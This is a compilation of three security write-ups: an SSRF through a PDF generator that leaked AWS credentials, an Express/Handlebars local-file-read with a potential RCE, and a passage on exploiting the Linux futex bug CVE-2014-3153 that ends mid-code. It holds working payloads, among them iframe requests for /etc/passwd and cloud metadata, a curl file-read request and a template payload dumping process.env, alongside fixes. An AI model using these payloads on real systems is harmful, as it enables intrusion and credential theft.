Story Behind Sweet SSRF.

Original text by Rohit Soni

Persistence is the Key to Success.🔥

Hey everyone! I hope you all are doing well!

Rohit Soni is back with another write-up, and this time it’s about a critical SSRF that led to AWS credentials disclosure. Let’s dive into it without wasting time.

A couple of months back, when the whole world was in lockdown due to the COVID-19 pandemic, I was spending most of my time hunting, learning, and exploring new stuff (specifically about pentesting😜).

One day, while scrolling through my LinkedIn feed, I saw a post from someone saying he had made it into a website’s hall of fame. The post caught my attention, and as I was not hunting on any program at the time, I started hunting on that one.

Note: I am not allowed to disclose the target website. So, Let’s call it

I created an account on the target site and started exploring every functionality. After spending a couple of hours hunting and exploring, I saw that my email address was reflected in the response inside a script tag, as shown in the image below.

Look at that email address.

Ahh… The very first thing that came to my mind was XSS. I changed my email address to “h4ck3d!!”)- but failed, because it is not a valid email address. In the very next moment, I intercepted the request using Burp, changed my email address in the intercepted request, and forwarded it.

Boom….Got Stored XSS.

XSS is Love❤ (Sorry for poor picture quality😅)
Payload reflected without filtering/encoding/sanitizing special characters.

The root cause of this XSS was a lack of input validation on the server side. The website validated the email address on the client side only, which is why it did not allow me to enter my payload directly in the email field. But as the server was not filtering or encoding special characters, my payload was stored and I got the pop-up.
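To make the root cause concrete, here is a minimal sketch of what the missing server-side checks could look like. The helper names and the email pattern are my own assumptions for illustration and are not taken from the target application: one function rejects values that are not plausible email addresses, and the other encodes a value before it is placed inside an inline script block.

```javascript
// Hypothetical helpers; names and the pattern are illustrative assumptions.

// Deliberately strict pattern: rejects quotes, angle brackets, and whitespace.
const EMAIL_PATTERN = /^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/;

// Server-side validation: never rely on the client-side check alone.
function isValidEmail(value) {
  return typeof value === "string" && value.length <= 254 && EMAIL_PATTERN.test(value);
}

// Serialize a value for embedding inside an inline <script> block.
// JSON.stringify takes care of quotes and backslashes; the extra replacements
// stop sequences such as "</script>" from closing the script element early.
function toInlineScriptLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

const payload = '"><script>alert(1)</script>';
console.log(isValidEmail("user@example.com")); // true
console.log(isValidEmail(payload));            // false
console.log(toInlineScriptLiteral(payload));   // contains no raw < or > characters
```

Either check on its own would have stopped this particular payload; doing both (validate on input, encode on output) is the more defensive choice.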

Okay, That’s cool but where is the SSRF you promised !? 😐

Main Story begins from here.

Stored XSS is a nice finding, but the hacker inside me was screaming “You can find a critical, I want a P1😜”. So I kept hunting and came across a functionality that exports user-supplied text to a PDF file.

After seeing this functionality, I remembered a write-up about SSRF through abuse of a PDF generator. I had not read the write-up, but I remembered the title. I quickly googled the title, found the right write-up, read it, and applied the same technique.

Identification Part :

I was able to figure out that the Custom cover page content field was vulnerable.

What I did was supply the HTML tags <center><u>hello there</u></center> as input in the Custom cover page content field and export it as a PDF, and I got something very interesting.

As you can see in the above screenshot, it accepted the HTML tags and generated the PDF according to them. Interesting..!!

The next step was to check whether it was vulnerable to SSRF. I confirmed that the PDF generation functionality was vulnerable to SSRF using an <iframe> tag and the Burp Collaborator client. The payload I used was:

<iframe src=""></iframe>

Woah, SSRF Identified. {^_^}

The HTTP request from the target server was logged in my Burp Collaborator client window.

Root cause: the <iframe> tag is used to embed one web page inside another. While generating the PDF file, the target server requested my Burp Collaborator URL in order to load it into the <iframe>. As a result, the request was logged in the Collaborator client.

Still, this SSRF on its own does not have much impact. Let’s exploit it and see what we can achieve.

Exploitation Part

To exploit this SSRF, I used the following payload.

<iframe src="http://localhost"></iframe>

But unfortunately it didn’t work and gave me a blank PDF file.

Failed. -_-

After that, I thought of loading files stored on the server, for example the /etc/passwd file. To do that, I built the following payload.

<iframe src="file://etc/passwd"></iframe>

But again, bad luck. I got the same blank PDF file.

I tried many different payloads to exploit the SSRF, but all of them failed. A few of them are as follows. (That I failed doesn’t mean you will too. Try your luck😉)

<iframe src="file://etc/shadow"></iframe>

<iframe src="http:localhost"></iframe>

<iframe src="//"></iframe>

<iframe src=""></iframe>

None of the above payloads worked for me. Then I thought of looking up on Shodan the IP address that had shown up in my Burp Collaborator client, and I learned that the website was running on an Amazon EC2 machine.

Website is Hosted on Amazon EC2 Instance.

After a considerable number of failed attempts, I took a break and thought of asking Ritik Sahni. He is a good friend of mine and a talented 15-year-old hacker. I called him and told him the whole scenario.

He took a few minutes and replied: try to load the following URL in the iframe source:

As soon as I did, I was like, Woah!! I got their internal directories and files listed in the iframe.

Got Internal Directories and Files.

You must be wondering where the IP address came from!

The IP address is a link-local address and is valid only from within the instance. In simple terms, we can say this IP is localhost for your EC2 instance.

Using it, we can retrieve the instance metadata.
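Looking at it from the defender’s side, a service that fetches URLs on behalf of users (like this PDF generator) can refuse loopback, private, and link-local targets before making any request. The sketch below is only an illustration under my own assumptions: the function names are hypothetical, the block list is not exhaustive, and it checks IP literals only. A real deployment would also need to resolve hostnames and check the resolved addresses, and handle redirects.

```javascript
const net = require("net");

// Convert a dotted IPv4 string into an unsigned 32-bit integer.
function ipv4ToInt(ip) {
  return ip.split(".").reduce((acc, octet) => ((acc << 8) | Number(octet)) >>> 0, 0);
}

// [network, prefix length] pairs that a URL fetcher usually has no reason to reach.
const BLOCKED_V4 = [
  ["0.0.0.0", 8],
  ["10.0.0.0", 8],     // private
  ["127.0.0.0", 8],    // loopback
  ["169.254.0.0", 16], // link-local
  ["172.16.0.0", 12],  // private
  ["192.168.0.0", 16], // private
];

function isBlockedIPv4(ip) {
  const value = ipv4ToInt(ip);
  return BLOCKED_V4.some(([network, bits]) => {
    const mask = (~0 << (32 - bits)) >>> 0;
    return ((value & mask) >>> 0) === ((ipv4ToInt(network) & mask) >>> 0);
  });
}

// Hypothetical gate to call before the renderer fetches a user-supplied URL.
function isAllowedFetchTarget(rawUrl) {
  let url;
  try {
    url = new URL(rawUrl);
  } catch {
    return false; // not a parseable absolute URL
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") return false;

  const host = url.hostname;
  if (net.isIPv4(host)) return !isBlockedIPv4(host);
  // Keep the sketch simple: refuse IPv6 literals entirely.
  if (net.isIPv6(host.replace(/^\[|\]$/g, ""))) return false;
  return host !== "localhost" && !host.endsWith(".localhost");
}

console.log(isAllowedFetchTarget("https://example.com/logo.png")); // true
console.log(isAllowedFetchTarget("http://localhost/"));            // false
console.log(isAllowedFetchTarget("http://169.254.0.1/"));          // false
console.log(isAllowedFetchTarget("file:///etc/passwd"));           // false
```

A block list like this is a second line of defense. Not rendering user-supplied HTML in the PDF generator at all would remove the problem at its source.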

Then Ritik told me to check the iam/ directory. I was able to get AWS security credentials from the iam directory. Have a look at the PoC attached below.

Final Payload:

<iframe src="" width="100%"></iframe>

It took me around 4 hours to identify and exploit the SSRF. Special thanks to my friend Ritik Sahni.

Hope you enjoyed my story. If you have any questions or suggestions, reach me through Instagram, Twitter, or LinkedIn.

Happy Hunting. 🙂

Instagram: @street_of_hacker

Twitter: @streetofhacker

LinkedIn: Rohit Soni

Special Thanks to Ritik Sahni:

And also Thanks to for amazing swags.😁

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps

Original text by CAPTAINFREAK


If you are using ExpressJs with Handlebars as templating engine invoked via hbs view engine, for Server Side Rendering, you are likely vulnerable to Local File Read (LFR) and potential Remote Code Execution (RCE).


  1. If the target responds with X-Powered-By: Express and there is HTML in the responses, it’s highly likely that NodeJs with server-side templating is being used.
  2. Add layout to your wordlist for parameter discovery/fuzzing of the GET query or POST body.
  3. If adding the layout parameter with an arbitrary value results in a 500 Internal Server Error with ENOENT: no such file or directory in the body, you have hit the LFR.


A little over a week ago, I stumbled upon a critical Local File Read (LFR) security issue, with the potential to give Remote Code Execution, in a fairly simple ~10 lines of NodeJS/ExpressJs code which looked like the following:

var express = require('express');
var router = express.Router();

router.get('/', function(req, res, next) {
  // ...
});

router.post('/', function(req, res, next) {
  var profile = req.body.profile
  res.render('index', profile)
});

module.exports = router;

The whole source can be found here.

If you are even a little bit familiar with the NodeJs ecosystem and have written at least your first Hello World endpoint in ExpressJs, you will agree that this is clearly straightforward and innocent-looking code.

So after getting surprised and disillusioned by the security bug, I remembered that it’s indeed called Dependency Hell. To be honest, I should not have been that surprised.

Betrayal by built-in modules, dependencies, and packages has been the source of numerous security bugs. This is a recurring theme in software security anyway.

To check whether this was a known issue, I created a CTF challenge and shared it with many of my talented friends across multiple community forums on Web Security, Node, Backend Engineering, CTFs, and BugBounty.

Node/Express.js Web Security Challenge:

Very short code:

Can you find the flag: 𝗰𝗳𝗿𝗲𝗮𝗸{.*}#nodejs #javascript #JS #ctf #bugbounty— CaptainFreak (@0xCaptainFreak) January 15, 2021

Turns out this was not known. Even after I gave out the whole source code of the challenge, only 4 people were able to solve it (all CTFers 🥳):

  1. @JiriPospisil
  2. @CurseRed
  3. @zevtnax
  4. @po6ix

Congrats to all the solvers 🎊 and thanks a lot to everybody who tried out the challenge.

For the people who still wanna try out, I plan to keep the Profiler Challenge up for one more week. Stop Reading and check it out now!

Challenge Solution

curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"profile\":{\"layout\": \"./../routes/index.js\"}}' ''

HTTP request:

Content-Length: 48
Content-Type: application/json

{
  "profile": {
    "layout": "./../routes/index.js"
  }
}

HTTP Response (content of routes/index.js):

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 463

var express = require('express');
var router = express.Router();

const flag = "cfreak{It’s called Dependency Hell for a reason! (}"

/* GET home page. */
router.get('/', function(req, res, next) {
  // ...
});

router.post('/', function(req, res, next) {
  var profile = req.body.profile
  res.render('index', profile)
});

module.exports = router;


"cfreak{It’s called Dependency Hell for a reason! (}"

That’s It! What the heck, right? You might be thinking, what even is this layout parameter? and where is it even coming from. Soo out of context!

If you like Code Review, why don’t you find out? It will be a good code review exercise.

Secret layout parameter

To find out from where it is coming, we can track the flow of our input from Source to Sink till we find out the reason why LFR is happening.

Source (Line 3):

router.post('/', function(req, res, next) {
  var profile = req.body.profile
  res.render('index', profile)
});

Let’s follow the path this profile object argument takes.

res.render = function render(view, options, callback) {
  var app = this.req.app;
  var opts = options || {};

  // ...

  // render
  app.render(view, opts, done);
};

The “index” argument became view, and our profile argument became the options parameter, which became opts and flowed into app.render.

app.render = function render(name, options, callback) {
  var opts = options;
  var renderOptions = {};
  var view;

  // ...

  merge(renderOptions, opts);

  // ...

  var View = this.get('view');

  view = new View(name, {
    defaultEngine: this.get('view engine'),
    root: this.get('views'),
    engines: engines
  });

  // ...

  // render
  tryRender(view, renderOptions, done);
};

function tryRender(view, options, callback) {
  try {
    view.render(options, callback);
  } catch (err) {
    callback(err);
  }
}

View.prototype.render = function render(options, callback) {
  debug('render "%s"', this.path);
  this.engine(this.path, options, callback);
};

In View class, this.engine becomes an instance of hbs in our case and this.path = rootViewDir + viewFilename. The options argument is our profile.

I will take the liberty here and modify the code a bit to make it linear and easy to understand, but you can check out the original version on Github.

function middleware(filename, options, cb) {
  // The Culprit
  var layout = options.layout;

  var view_dirs = options.settings.views;
  var layout_filename = [].concat(view_dirs).map(function (view_dir) {
    // Some code to create full paths
    var view_path = path.join(view_dir, layout || 'layout');

    // This actually restricts reading/executing files without extensions.
    if (!path.extname(view_path)) {
      view_path += extension;
    }
    return view_path;
  });

  // ...

  // in-memory caching Code
  function tryReadFileAndCache(templates) {
    var template = templates.shift();
    fs.readFile(template, 'utf8', function(err, str) {
      cacheAndCompile(template, str);
    });
  }

  function cacheAndCompile(filename, str) {
    // Here we get compiled HTML from handlebars
    var layout_template = handlebars.compile(str);
    // Some further logic
  }
}

We can stop analysing here. As you can see at the fs.readFile call, we effectively read from the root views directory + layout and pass the contents to handlebars.compile, which gives us the HTML after compiling a file whose path we completely control (except for the extension, which is appended explicitly from the config if the path does not already have one; see the view_path += extension line).

Hence the LFR: we can read any file that has an extension.
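The path handling is easy to try in isolation. Below is a small model of just that logic, not the hbs source itself: the function name resolveLayoutPath, the /app/views directory, and the .hbs extension are assumptions made for the example, and path.posix is used so the result is the same on every platform.

```javascript
const path = require("path");

// Simplified model of the layout path logic from the excerpt above.
function resolveLayoutPath(viewDir, layout, extension) {
  // path.join normalizes "..", so a user-supplied layout can climb out of viewDir.
  let viewPath = path.posix.join(viewDir, layout || "layout");

  // Only paths without an extension get the configured one appended.
  if (!path.posix.extname(viewPath)) {
    viewPath += extension;
  }
  return viewPath;
}

// Default case: no layout supplied.
console.log(resolveLayoutPath("/app/views", undefined, ".hbs"));
// -> /app/views/layout.hbs

// Challenge payload: the extension is present, so the path is used as is.
console.log(resolveLayoutPath("/app/views", "./../routes/index.js", ".hbs"));
// -> /app/routes/index.js

// No extension: ".hbs" is appended, which is why /etc/passwd is out of reach.
console.log(resolveLayoutPath("/app/views", "../../etc/passwd", ".hbs"));
// -> /etc/passwd.hbs
```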


As the templating is involved, we do have a strong potential for RCE. It has the following pre-requisites though:

  1. Through the above LFR, read ./../package.json.
  2. Check the version of hbs being used; it should be <= 4.0.3, because after this version the hbs team started using Handlebars.js version >= 4.0.14 (commit link).
  3. In Handlebars below this version, it was possible to create RCE payloads. There is an awesome writeup on this by @Zombiehelp54, with which they got RCE on Shopify.
  4. You also need a file upload functionality on the same box with a known location, which is quite an ask considering everybody uses blob storage these days, but we never know 🤷‍♂️

With the above fulfilled, you can write a Handlebars template payload like the one below to get RCE:

<!-- (by @avlidienbrunn) -->

{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.push (lookup string.sub "constructor")}}
{{#with string.split as |codelist|}}
{{this.push "return JSON.stringify(process.env);"}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}

Fix 🤕

An easy fix is to stop using the anti-pattern shown in the example above:

❌ res.render('index', profile)

✅ res.render('index', { profile })

Many devs, I think, already use the second form so that they can be more descriptive in templates, writing “{{profile.name}}” rather than just “{{name}}”.
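The difference between the two calls is only where the user-controlled keys end up. A quick sketch with plain objects (the name field is made up for the example; the layout value is the one from the challenge solution):

```javascript
// Parsed request body, as an attacker might send it.
const body = { profile: { name: "guest", layout: "./../routes/index.js" } };

// Anti-pattern: the user object itself becomes the render options.
const unsafeOptions = body.profile;

// Wrapped: user data sits one level down, under a key the server chose.
const wrappedOptions = { profile: body.profile };

console.log(unsafeOptions.layout);  // ./../routes/index.js (attacker-controlled)
console.log(wrappedOptions.layout); // undefined
```

In the wrapped form, the attacker’s layout key is still there as profile.layout, but it is no longer a top-level option that the view engine reads.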

But think for a second again, is the above code safe? Yea sure, we don’t have a way to provide layout in the options argument to res.render anymore. But is there any way to still introduce the culprit layout parameter?

Prototype Pollution!

It would be ignorant if we don’t mention proto pollution in a Js/NodeJs Web Security writeup 🙃 !

Readers who are unaware of proto pollution, please watch this awesome talk from Olivier Arteau at NorthSec18.

As you can see, even the most common pattern of passing objects to the render function (res.render('template', { profile })) is not safe. If the application has prototype pollution anywhere that lets an attacker add layout to the prototype chain, the output of every call to res.render will be overwritten with LFR/RCE. So we have DoS-ish LFR/RCE! In the presence of exploitable proto pollution, this becomes quite a good gadget, and it stays unfixable unless we fix the proto pollution.
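Here is a minimal sketch of why the wrapped form does not help once the prototype is polluted. The direct assignment to Object.prototype below merely stands in for a real pollution bug elsewhere in an application, and the for...in loop stands in for any merge helper that copies inherited enumerable keys; both are assumptions made for the demonstration.

```javascript
// Stand-in for a prototype pollution bug somewhere else in the app.
Object.prototype.layout = "./../routes/index.js";

const renderOptions = { profile: { name: "guest" } };

// layout is not an own property, yet a plain property read still finds it.
const ownLayout = Object.prototype.hasOwnProperty.call(renderOptions, "layout");
const inheritedLayout = renderOptions.layout;
console.log(ownLayout);       // false
console.log(inheritedLayout); // ./../routes/index.js

// A for...in style merge copies inherited enumerable keys as own properties.
const merged = {};
for (const key in renderOptions) {
  merged[key] = renderOptions[key];
}
console.log(Object.prototype.hasOwnProperty.call(merged, "layout")); // true

// Undo the simulated pollution.
delete Object.prototype.layout;
```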

Solid Fix

  1. First, fix proto pollution if you are vulnerable to it.
  2. Then remove the layout key from the object, or do whatever it takes to stop it from reaching the vulnerable sink.
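One possible shape for the second step, as a sketch only: build the options object on the server, drop layout from the user data, and set layout as an own property so that an inherited value cannot be picked up by a plain property read. The helper name buildRenderOptions is hypothetical, and the sketch assumes the view engine treats an explicit layout value of "layout" the same as its default, which is worth verifying against the hbs version in use.

```javascript
// Hypothetical helper: render options are built from server-chosen values only.
function buildRenderOptions(userProfile, layoutName = "layout") {
  // Rest destructuring copies own enumerable keys only, minus the ones named here.
  const { layout, settings, ...safeProfile } = userProfile || {};
  // An own "layout" property shadows anything inherited from a polluted prototype.
  return { profile: safeProfile, layout: layoutName };
}

// Simulate the pollution from the previous section.
Object.prototype.layout = "./../routes/index.js";

const pinned = buildRenderOptions({ name: "guest", layout: "../../secret.txt" });
console.log(pinned.layout); // layout
console.log(Object.prototype.hasOwnProperty.call(pinned.profile, "layout")); // false

// Undo the simulated pollution.
delete Object.prototype.layout;
```

This only narrows the gadget; the pollution itself still has to be fixed, as step 1 says.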

Let me know what you think the proper fix should be.

Above, I have described my observations on a potentially critical vulnerability in the setup of NodeJS + Express + HBS.

As this setup is pretty common, I wanted this writeup to be out there. The Handlebars engine in particular is very popular due to its support for HTML semantics. Every time I work on a side project, I quickly set up the boilerplate code with the express-generator CLI one-liner express --view hbs, and this creates the exact same stack the above issue is about. I don’t know how many times I might have used that line myself. I plan to do the same kind of review for the other view engines that express supports (ejs, hjs, jade, pug, twig, vash).

Anyways, thanks for Reading! If something is erroneous, please let me know, would love to have a constructive discussion.

It’s called Dependency Hell for a reason!


Exploiting CVE-2014-3153 (Towelroot)

Original text by Elon Gliksberg

Understanding The Kernel

For quite some time now, I’ve been wanting to unveil the internals of modern operating systems.
I didn’t like how the most basic and fundamental level of a computer was so abstract to me,
and that I did not truly grasp how some of it works, a “black-box”.

I’ve always been more than familiar with kernel and OS concepts,
but there’s a big gap from comprehending them as a user versus a kernel hacker.
I wanted to see code, not words.

In order to tackle that, I decided to take on a small kernel exploit challenge and, in parallel, read Linux Kernel Development. Initially, the thought of reading the kernel’s code seemed a bit spooky: “I wouldn’t understand a thing”. Little by little, it became less intimidating, and honestly, it turned out to be much easier than I expected.

Now I feel tenfold more comfortable simply looking something up in the source in order to understand how it works, rather than searching man pages endlessly or consulting other people.

Kernel Exploitation

The book was really nice and all, but I wanted to get my hands dirty.
I searched for a disclosed vulnerability within the Linux kernel,
my plan being that I’d read its plain description and develop my own exploit for it.
A friend recommended CVE-2014-3153, also known as Towelroot, and I just went for it.
Back in the day, it was very commonly used to root Android devices.

Fast Userspace Mutex

The vulnerability is based around a mechanism called Futex within the kernel.
Futex being a wordplay on Fast userspace Mutex.

The Linux kernel provides futexes as a building block for implementing userspace locking.
A Futex is identified by a piece of memory which can be shared between processes or threads. In its bare form, a Futex is a counter that can be incremented and decremented atomically and processes can wait for its value to become positive.

Futex operation occurs entirely in userspace for the noncontended case.
The kernel is involved only to arbitrate the contended case.
Lock contention is a state where a thread attempts to acquire a lock that is already held by another thread.

The futex() system call provides a method for waiting until a certain condition becomes true. It is typically used as a blocking construct in the context of shared-memory synchronization. When using futexes, the majority of the synchronization operations are performed in user space. A user-space program employs the futex() system call only when it is likely that the program has to block for a longer time until the condition becomes true. Other futex() operations can be used to wake any processes or threads waiting for a particular condition.

I will cover only the terms and concepts related to the exploitation.
For a more profound insight about futexes, please reference man futex(2) and man futex(7).
I strongly suggest messing around with the examples in order to assess your understanding.

The futex() syscall isn’t typically used by “everyday” programs, but rather by system libraries such as pthreads that wrap its usage. That’s why the syscall doesn’t have a glibc wrapper like most syscalls do. In order to call it, one has to use syscall(SYS_futex, ...).

Due to the blocking nature of futex() and it being a way to synchronize between different tasks,
you’d notice how there’s a lot of dealing with threads within the exploit which can get slightly confusing unless approached slowly.

There are two core concepts to understand about futexes in general which we’d talk a lot about.

The first is something called a waiters list, also known as the wait queue.
This term refers to the blocking threads that are currently waiting for a lock to be released.
It is held in kernelspace and programs can issue syscalls to carry out operations on it. For instance, attempting to lock a contended lock would result in an insertion of a waiter, releasing a lock would pop a waiter from the list and reschedule its task.

The second is that there are two kinds of futexes: PI & non-PI.
PI stands for Priority Inheritance.

Priority inheritance is a mechanism for dealing with the priority-inversion problem. With this mechanism, when a high-priority task becomes blocked by a lock held by a low-priority task, the priority of the low-priority task is temporarily raised to that of the high-priority task, so that it is not preempted by any intermediate level tasks, and can thus make progress toward releasing the lock.

This introduces the ability to prioritize waiters among the futex’s waiters list.
A higher-priority task is guaranteed to get the lock before a lower-priority task.
This is unlike non-PI operations, such as FUTEX_WAKE:

This operation wakes at most val of the waiters that are waiting (e.g., inside FUTEX_WAIT) on the futex word at the address uaddr. Most commonly, val is specified as either 1 (wake up a single waiter) or INT_MAX (wake up all waiters). No guarantee is provided about which waiters are awoken (e.g., a waiter with a higher scheduling priority is not guaranteed to be awoken in preference to a waiter with a lower priority).

Both non-PI and PI futex types are used within the exploit.
The way PI futexes are implemented is using what’s called in the kernel a plist, a priority-sorted list.
If you don’t know what it is, you could take a look here, though this image sums it up perfectly.

Priority List Image

All images are copied from Appdome.
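For readers who prefer code over a picture, here is a toy model of the idea in JavaScript. It is only a sketch: the kernel’s plist is built from linked lists in C, while this version uses a plain array and a class name of my own, but the ordering rule is the same (a lower prio value means a higher priority, and nodes with equal priority keep their insertion order).

```javascript
// Toy priority-sorted list: lower prio value = higher priority, FIFO among equals.
class PriorityList {
  constructor() {
    this.nodes = [];
  }

  // Insert after every node whose priority is at least as high as the new one.
  add(node) {
    let i = 0;
    while (i < this.nodes.length && this.nodes[i].prio <= node.prio) {
      i++;
    }
    this.nodes.splice(i, 0, node);
  }

  remove(node) {
    const i = this.nodes.indexOf(node);
    if (i !== -1) this.nodes.splice(i, 1);
  }

  // The top waiter is simply the head of the list.
  first() {
    return this.nodes[0];
  }
}

const waiters = new PriorityList();
waiters.add({ name: "A", prio: 120 });
waiters.add({ name: "B", prio: 100 });
waiters.add({ name: "C", prio: 120 });

console.log(waiters.nodes.map((n) => n.name).join(" ")); // B A C
console.log(waiters.first().name);                        // B
```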

Bug & Vulnerability

Here’s the CVE description.

The futex_requeue function in kernel/futex.c in the Linux kernel through 3.14.5 does not ensure that calls have two different futex addresses, which allows local users to gain privileges via a crafted FUTEX_REQUEUE command that facilitates unsafe waiter modification.

Let’s break it down.
First, we need to understand what’s a requeue operation in the context of futexes.
A waiter, blocking thread, that is contending on a lock, can be “requeued” by a running thread to be told to wait on a different lock instead of the one that it currently waits on.

A waiter on a non-PI futex can be requeued to either a different non-PI futex, or to a PI-futex.
A waiter on a PI-futex cannot be requeued.
The bug itself is that there are no validations whatsoever on requeuing from a futex to itself.

This allows us to requeue a PI-futex waiter to itself, which clearly violates the following policy.

Requeues waiters that are blocked via FUTEX_WAIT_REQUEUE_PI on uaddr from a non-PI source futex (uaddr) to a PI target futex (uaddr2).

Take a look at the bug fix commit, both the description and the code changes.

Though, what actually happens when you requeue a waiter to itself? Good question.

Before actually diving into the exploit, I decided to provide a rough overview of how it works for context further on. Eventually, what this bug gives us is a dangling waiter within the futex’s waiters list. The way the exploit does that is as follows:

1. FUTEX_LOCK_PI: Lock a PI futex.
2. FUTEX_WAIT_REQUEUE_PI: Wait on a non-PI futex, with the intention of being requeued to the PI futex.
3. FUTEX_CMP_REQUEUE_PI: Requeue the non-PI futex waiter onto the PI futex.
4. Userspace Overwrite: Set the PI futex’s value to 0 so that the kernel treats it as if the lock is available.
5. FUTEX_CMP_REQUEUE_PI: Requeue the PI futex waiter to itself.

And now we’ll understand why this results in a dangling waiter.

There are a lot of different data types within the Futex’s implementation code,
in order to cope with that I made somewhat of a summary of them to help me keep track of what’s going on. Feel free to use it as needed.

Step 1

We start off by locking the PI-futex. We do that because we want the first requeue (step 3) to block and create a waiter on the waiters list, rather than acquire the lock immediately. That waiter is destined to be our dangling waiter later on in the exploit.

Step 2

In order to requeue a waiter from a non-PI futex to a PI futex, we first have to invoke FUTEX_WAIT_REQUEUE_PI on the non-PI futex, which in turn translates to the futex_wait_requeue_pi() function.
What this function does is take a non-PI futex and wait (FUTEX_WAIT) on it, along with a PI-futex that the waiter can potentially be requeued to with a FUTEX_CMP_REQUEUE_PI command later on.

static int futex_wait_requeue_pi(u32 __user *uaddr, unsigned int flags,
				 u32 val, ktime_t *abs_time, u32 bitset,
				 u32 __user *uaddr2)
{
	struct hrtimer_sleeper timeout, *to = NULL;
	struct rt_mutex_waiter rt_waiter; // <-- Important
	struct rt_mutex *pi_mutex = NULL;
	struct futex_hash_bucket *hb;
	union futex_key key2 = FUTEX_KEY_INIT;
	struct futex_q q = futex_q_init;
	int res, ret;

	/* ... */
}

The function defines various local variables, the most important of which is the rt_waiter variable.
Unsurprisingly, this variable is our waiter.

struct rt_mutex_waiter {
    struct plist_node    list_entry;
    struct plist_node    pi_list_entry;
    struct task_struct    *task;
    struct rt_mutex        *lock;
    /* ... */
};

It contains the lock that it waits on, it holds references to other waiters in the waiters list through the list_entry plist node, and on top of that it also has a pointer to the task that is blocked on the lock.

Needless to say, the locals are placed on the kernel stack, but it is worth mentioning because it will be crucial to understand later on.

Later on, it initializes the futex queue entry and enqueues it.

	q.bitset = bitset;
	q.rt_waiter = &rt_waiter;
	q.requeue_pi_key = &key2;
	/* Queue the futex_q, drop the hb lock, wait for wakeup. */
	futex_wait_queue_me(hb, &q, to);

Note how it sets the requeue_pi_key to the futex key of the target futex.
This is part of what allows us to self-requeue. We’ll see this in the final step.

At this point in the code, the function simply blocks and does not continue unless:

  1. A wakeup occurs.
  2. The process is killed.

Step 3

Next up, futex_requeue() is called by the FUTEX_CMP_REQUEUE_PI operation in another thread in order to do the heavy lifting of actually requeuing the waiter. This is the vulnerable and most important function in the exploit. The function is fairly long, so I’m not going to review all of its logic and will only address the relevant parts.
I do encourage you to skim over it and try to get a hold of what it does.

static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
             u32 __user *uaddr2, int nr_wake, int nr_requeue,
             u32 *cmpval, int requeue_pi)
{
    /* ... */
    if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
        ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
                &key2, &pi_state, nr_requeue);
        /*
         * Lock is already acquired due to our call to FUTEX_LOCK_PI in step 1.
         * Therefore the acquisition fails and 0 is returned.
         * We will revisit futex_proxy_trylock_atomic below.
         */
        /* ... */
    }

    head1 = &hb1->chain;
    plist_for_each_entry_safe(this, next, head1, list) {
        /* ... */
        if (requeue_pi) {
            this->pi_state = pi_state;
            ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,
                            this->rt_waiter,
                            this->task, 1);
            /*
             * this->rt_waiter points to the local variable rt_waiter
             * in the futex_wait_requeue_pi from step 2.
             * It is now added as a waiter on the new lock.
             */
            /* ... */
        }
        /* ... */
    }
    /* ... */
}

Let’s quickly glance at the code that requeues the waiter at rt_mutex_start_proxy_lock().

int rt_mutex_start_proxy_lock(struct rt_mutex *lock,
			      struct rt_mutex_waiter *waiter,
			      struct task_struct *task, int detect_deadlock)
{
	int ret;

	/* ... */

	// Attempt to take the lock. Fails because lock is taken.
	if (try_to_take_rt_mutex(lock, task, NULL)) {
		/* ... */
		return 1;
	}

	ret = task_blocks_on_rt_mutex(lock, waiter, task, detect_deadlock);

	/* ... */
}

And inside task_blocks_on_rt_mutex().

static int task_blocks_on_rt_mutex(struct rt_mutex *lock,
				   struct rt_mutex_waiter *waiter,
				   struct task_struct *task,
				   int detect_deadlock)
{
	struct task_struct *owner = rt_mutex_owner(lock);
	struct rt_mutex_waiter *top_waiter = waiter;
	unsigned long flags;
	int chain_walk = 0, res;

	/* ... */

	// Set the waiter's task and rt_mutex members.
	waiter->task = task;
	waiter->lock = lock;
	// Initialize the waiter's list entries.
	plist_node_init(&waiter->list_entry, task->prio);
	plist_node_init(&waiter->pi_list_entry, task->prio);

	/* Get the top priority waiter on the lock */
	if (rt_mutex_has_waiters(lock))
		top_waiter = rt_mutex_top_waiter(lock);

	// Add the waiter to the waiters list.
	plist_add(&waiter->list_entry, &lock->wait_list);

	/* ... */
}

Now, rt_waiter of futex_wait_requeue_pi() is a node in the waiters list of our PI futex.

Step 4

Here we’ll set the userspace value of the futex, also known as the futex-word, to 0.
This is vital so that when the self-requeuing occurs, the call to futex_proxy_trylock_atomic() will succeed and wake the top waiter of the source futex, which is in fact the same as the destination futex. The problem arises when we have a waiter in the waiters list whose thread we can wake up without forcing its deletion from the waiters list.

It might seem confusing at first but it’ll clear up in the next step.

Step 5

In this step, we’ll requeue the PI futex waiter to itself and invoke futex_requeue() once again.

	if (requeue_pi && (task_count - nr_wake < nr_requeue)) {
		/*
		 * Attempt to acquire uaddr2 and wake the top waiter. If we
		 * intend to requeue waiters, force setting the FUTEX_WAITERS
		 * bit.  We force this here where we are able to easily handle
		 * faults rather in the requeue loop below.
		 */
		ret = futex_proxy_trylock_atomic(uaddr2, hb1, hb2, &key1,
						 &key2, &pi_state, nr_requeue);
		/* ... */
	}

Let’s take a look at futex_proxy_trylock_atomic() this time.

/*
 * Return:
 *  0 - failed to acquire the lock atomically;
 *  1 - acquired the lock;
 * <0 - error
 */
static int futex_proxy_trylock_atomic(u32 __user *pifutex,
				 struct futex_hash_bucket *hb1,
				 struct futex_hash_bucket *hb2,
				 union futex_key *key1, union futex_key *key2,
				 struct futex_pi_state **ps, int set_waiters)
{
	struct futex_q *top_waiter = NULL;
	u32 curval;
	int ret;

	/* ... */

	top_waiter = futex_top_waiter(hb1, key1);

	/* There are no waiters, nothing for us to do. */
	if (!top_waiter)
		return 0;

